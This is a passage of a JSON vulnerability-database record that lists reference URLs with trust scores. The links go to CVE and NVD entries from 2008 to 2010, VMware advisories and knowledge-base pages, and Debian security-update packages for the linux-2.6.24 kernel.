        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3541"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3559"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3565"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1027904"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-0107"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0433"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0842"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3574"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0886"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0734"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1157"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0007"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0850"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2524"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0839"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1084"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0088"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0849"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2070"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4308"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3549"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3568"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0084"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5416"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3864"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3825"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0410"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3572"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0092"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0003"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0094"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3566"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0847"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0740"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0082"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0437"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0844"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3548"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2066"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0087"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2693"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1029353"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0085"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0846"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2226"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0008"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1641"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2928"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0106"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0845"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0848"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0095"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3569"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0085"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0090"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3081"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3551"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0843"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2691"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4005"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
